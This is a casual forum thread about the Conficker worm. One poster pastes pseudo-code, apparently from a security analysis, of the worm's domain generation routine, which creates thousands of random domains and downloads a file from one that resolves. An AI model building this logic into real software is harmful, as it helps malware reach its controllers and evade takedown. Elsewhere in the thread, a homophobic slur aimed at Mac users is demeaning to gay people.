Conflicker Worm

[briflip]

sweet thanks for the info then.

and btw i wasnt trying to like start an arguement or anything out of this haha. i just said what i knew and i never heard anything about it being activated i just heard from everywhere else nothing happened

i feel ya





* note to anyone that thinks this shit is a joke and thinks your safe YOUR NOT
i found code that the conflicker c uses .... this shit is intense (if you understand code)

Below is the domain generation i was talking about where it looks for instructions on websites
i also found code that once conflicker c is infected on your computer it disable all MICRSOFT SECURITY WEAR then happily deletes it

so F U conflicker


int domain_name_generation()
{
// local declarations
hMem = 0;
check_if_MS_DEF_PROV();
get_time_from_popular_web_sites();
// baidu.com, google.com, yahoo.com, ask.com, w3.org,
// facebook.com, imageshack.us, rapidshare.com

hMem = GlobalAlloc(0x40u, 0x30D40u); // global array - 50,000 random names
if ( hMem )
{
while ( 1 )
{
counter_domains = counter;
if ( counter >= 50000 )
break;

size_of_name = DGA_random_function() % 6 + 4;
// size of domain name is between 4 and 10 chars
// append "." at the end of the name
random = DGA_random_function();
strcat(domainname, TLD-suffix[random num % 116] );
// append 1 of 116 suffixes (from 110 TLDs) to domain name
++counter;
}

// select and query 500 domains
counter_domains = 0;
while ( !success_download && counter_domains < 500 )
{
// random number modulo 50,000
one_in_50000_names = conficker_D_PRNG_function() % 50,000);
hostent = gethostbyname(one_in_50000_names);
// resolve name to a set of IP addresses
if ( hostent )
{
host_address = hostent->address_list; // get list of IPs
array_previously_checked_IPs[counter_domains] = host_address;

if ( *host_address )
{
// skip if domain name resolves to multiple IP addresses
if ( !*(host_address + 1) )
{
// skip if IP is local host or other trivial IPs
if ( check_IP_value(host_address) )
{
is_blacklisted_ip = check_if_IP_is_in_ranges(host_address);
// skip if IP is blacklisted
if ( ! is_blacklisted_ip )
{
found = 0;
index = 0;
while (index < counter_domains )
{
if (host_address == array_previously_checked_IPs[index] )
{
found = 1;
break; // break if IP has been previously encountered
}
++index;
}
// skip if IP has been previously encountered
if ( !found )
{
snprintf(Dest, 0x80u, "http://%s", host_address);
success_download = download_and_validate_file(Dest);
// HTTP request to the domain and download valid file
}
}
}
}
}
}
Sleep(...); // sleep small random amount
++counter_domains;
}
}
GlobalFree(hMem);
return success_download;
}


Figure 2: Domain generation pseudo-code

 

[briflip]

ahh, the beauty of Mac. {-)

STFU ABOUT YOUR GAY ASS MACS.... they suck http://www.computerworld.com/action...Basic&taxonomyName=security&articleId=9129978

 

[briflip]

bump

 

[Brian Murphy]

ahh, the beauty of Mac. {-)

STFU ABOUT YOUR GAY ASS MACS.... they suck http://www.computerworld.com/action...Basic&taxonomyName=security&articleId=9129978

i don;t see how they suck at all at my school they say macs were not compatible but i still got a mac both of my roomates have problems with there internet everyday

 

[briflip]

they are useful but definitely not safe from viruses

 

[Matt]

liltony got it lol

 

[Devin Catron]

damn that sucks i just got a mac like 3 months ago